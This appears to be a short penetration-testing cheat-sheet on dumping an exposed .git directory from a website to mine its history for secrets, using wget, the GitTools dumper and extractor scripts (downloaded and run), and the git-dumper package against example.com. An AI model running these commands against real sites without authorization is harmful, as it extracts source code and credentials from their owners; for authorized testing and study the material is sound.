Dump Git Repository from Website

If we can have permission to access git repositoy in target website, we can dump the git repository and investigate git logs or histories to get sensitive information.

Dumping

We can simply use wget command in Linux to download the git repository.
After that, we can investigate files or all histories.

# -r: Recursive
wget -r https://example.com/.git/
cd example.com
git log --stat
git checkout <commit_id>


Dumping with gitdumper and extracter

GitTools downloads Git repository of the web application.
To dump the repository, execute the following commands.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example

We should get the git repository in local.
Then extract the entire project by executing the following.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example

Now we retrieve the entire git project from website.
It is stored in “./new_example” folder. We can investigate the repository.


Dumping with Git-Dumper

git-dumper is an useful Python package.

pip install git-dumper
git-dumper https://example.com/.git ./dumped